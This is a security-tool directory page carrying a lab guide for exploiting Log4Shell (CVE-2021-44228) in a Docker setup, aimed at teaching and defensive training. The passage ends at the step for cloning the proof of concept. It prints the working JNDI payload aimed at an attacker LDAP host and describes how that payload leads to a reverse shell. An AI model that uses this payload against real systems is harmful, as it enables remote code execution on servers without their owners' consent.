Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Log4Shell-CVE-2021-44228 — Hands-on lab for exploiting and understanding Log4Shell (CVE-2021-44228) using Docker, Kali Linux, Burp Suite and log4j-shell-poc. For teaching and defensive training in controlled lab environments only. | Kitploit
Tools/GitHubGitHub/drhaitham/log4shell-cve-2021-44228
Payload GenerationVulnerability AnalysisExploitationReverse EngineeringWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming
Labs & Practice
GitHubdrhaitham/log4shell-cve-2021-44228

Log4Shell-CVE-2021-44228

Hands-on lab for exploiting and understanding Log4Shell (CVE-2021-44228) using Docker, Kali Linux, Burp Suite and log4j-shell-poc. For teaching and defensive training in controlled lab environments only.

View Repository
149 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploiting Log4Shell (CVE-2021-44228): A Complete, Modern Demonstration Lab

Log4Shell (CVE-2021-44228) is one of the most impactful remote code execution vulnerabilities ever disclosed. It affects Apache Log4j 2, a widely used Java logging framework, and allows attackers to execute arbitrary code by abusing JNDI lookups in log messages.

This guide provides a full, reproducible demonstration lab using:

  • Kali Linux (attacker)
  • A Dockerised vulnerable Log4j2 application
  • The public PoC log4j-shell-poc
  • curl, Burp Suite, and Netcat

It is designed for teaching, research, training, and defensive awareness in controlled environments only. The structure and style follow the same spirit as the companion “Shellshock” lab README.


📌 Table of Contents

  1. Legal & Ethical Notice
  2. High-Level Overview
  3. Learning Objectives
  4. Lab Architecture
  5. Prerequisites
  6. Install JDK 1.8.0_202 on Kali
  7. Deploy the Vulnerable Log4j Application (Docker)
  8. Prepare the Exploit PoC
  9. Configure poc.py to Use JDK 1.8.0_202
  10. Start Exploit Services (LDAP + HTTP + Payload)
  11. Start the Reverse Shell Listener
  12. Exploit Log4Shell via curl
  13. Exploit Log4Shell via Burp Suite
  14. Attack Chain Diagram
  15. Countermeasures & Defence
  16. Cheat Sheet (All Commands)
  17. Screenshot Gallery (Optional)
  18. References
  19. Credits

0. Legal & Ethical Notice

This lab must only be performed in a controlled environment where you have explicit authorisation (your own lab, classroom VMs, etc.).

  • Do not attack production systems.
  • Do not run this against hosts you do not own or administer.
  • Use this material solely for education, research, and defence.

1. High-Level Overview

Log4Shell (CVE-2021-44228) is a critical RCE vulnerability in Apache Log4j 2.

The problem arises because vulnerable Log4j2 versions interpret attacker-controlled strings such as:

${jndi:ldap://ATTACKER_IP:1389/a}

When this string is logged, Log4j:

  1. Performs a JNDI lookup (e.g. via LDAP) to an attacker-controlled server.
  2. Receives a reference to a malicious Java class.
  3. Downloads the class over HTTP and loads it into the JVM.
  4. Executes it, yielding remote code execution.

In this lab, you will:

  • Run a vulnerable Log4j2 web application inside a Docker container.
  • Run a malicious LDAP + HTTP server on Kali using log4j-shell-poc.
  • Deliver the Log4Shell payload via curl and via Burp Suite.
  • Capture a reverse shell from the vulnerable container.

2. Learning Objectives

By the end of this lab, you should be able to:

  1. Explain at a high level how Log4Shell works and why JNDI is dangerous when misused.
  2. Deploy a vulnerable Log4j2 application using Docker.
  3. Install and configure JDK 1.8.0_202, required by the PoC.
  4. Run a malicious LDAP server and HTTP server via the PoC script.
  5. Trigger the vulnerability and obtain a reverse shell.
  6. Use Burp Suite to inject the exploit into an HTTP header.
  7. Discuss realistic mitigations and detection strategies.

3. Lab Architecture

All components run on top of your existing virtual lab. For this write-up we assume:

  • Kali Linux VM is the attacker.
  • Kali also runs the Docker container containing the vulnerable app.
ComponentRole / DescriptionTools / ServicesExample Addressing
Kali Linux VM (Attacker + Host)Runs PoC exploit, LDAP server, HTTP server, Netcat listener, Burp SuitePython 3, JDK 1.8.0_202, Netcat, Burp Suite, Docker, curl, Git192.168.1.4 (example Kali IP)
Vulnerable Log4j2 web applicationTarget; Spring Boot web app vulnerable to Log4ShellDocker image: ghcr.io/christophetd/log4shell-vulnerable-appExposed at http://127.0.0.1:8080

Key idea

The attacker injects:

${jndi:ldap://192.168.1.4:1389/a}

into an HTTP header. The vulnerable app logs it using Log4j2 → performs a JNDI LDAP lookup to 192.168.1.4:1389 → downloads a malicious class from http://192.168.1.4:8000 → executes the class, which opens a reverse shell back to 192.168.1.4:9001.


4. Prerequisites

On Kali you need:

  • Docker (installed and working).
  • Python 3 (default on Kali).
  • Netcat (nc).
  • Burp Suite (Community Edition is fine).
  • Internet access for initial downloads.
  • Basic familiarity with Linux and HTTP.

Throughout this guide we assume the Kali IP is:

192.168.1.4

If your IP differs, adjust all commands accordingly.


5. Install JDK 1.8.0_202 on Kali (Mandatory)

The PoC relies on Java SE 8 Update 202 (JDK 1.8.0_202) because later Java versions restrict the remote class loading behaviour used by this exploit.

Even if Kali already has OpenJDK 21 (or similar), you still need to install 8u202 separately.

5.1 Create a working directory

mkdir -p ~/Log4Shell
cd ~/Log4Shell

5.2 Download JDK 8u202 from HuaweiCloud mirror

Mirror root:

https://mirrors.huaweicloud.com/java/jdk/8u202-b08/

Download the Linux x64 tarball (≈185 MB):

wget https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz
ls -lh jdk-8u202-linux-x64.tar.gz   # should be ~185M

5.3 Extract to /usr/bin/jdk1.8.0_202

sudo mkdir -p /usr/bin/jdk1.8.0_202
sudo tar -xvf jdk-8u202-linux-x64.tar.gz \
  -C /usr/bin/jdk1.8.0_202 --strip-components=1

The --strip-components=1 option removes the top-level directory from the archive so files land directly under /usr/bin/jdk1.8.0_202.

5.4 Verify the installation

/usr/bin/jdk1.8.0_202/bin/java -version

Expected output:

java version "1.8.0_202"
Java(TM) SE Runtime Environment (build 1.8.0_202-b08)
Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)

If you see this, JDK 1.8.0_202 is correctly installed.


6. Deploy the Vulnerable Log4j Application (Docker on Kali)

In a new terminal on Kali (you can remain in ~/Log4Shell):

docker run --name vulnerable-app --rm -p 8080:8080 \
  ghcr.io/christophetd/log4shell-vulnerable-app@sha256:6f88430688108e512f7405ac3c73d47f5c370780b94182854ea2cddc6bd59929

You should see logs similar to:

:: Spring Boot ::  (v2.6.1)
Tomcat initialized with port(s): 8080 (http)
Tomcat started on port(s): 8080 (http) with context path ''
Started VulnerableAppApplication ...
  • The app is now reachable at http://127.0.0.1:8080/ from Kali.
  • Leave this terminal running. This is your target.

Quick sanity-check:

curl http://127.0.0.1:8080/

You may see a Whitelabel Error Page (HTTP 400). That is fine – all we need is the app running and logging requests.


7. Prepare the Exploit PoC on Kali

7.1 Clone log4j-shell-poc

In a new terminal:

Download Tool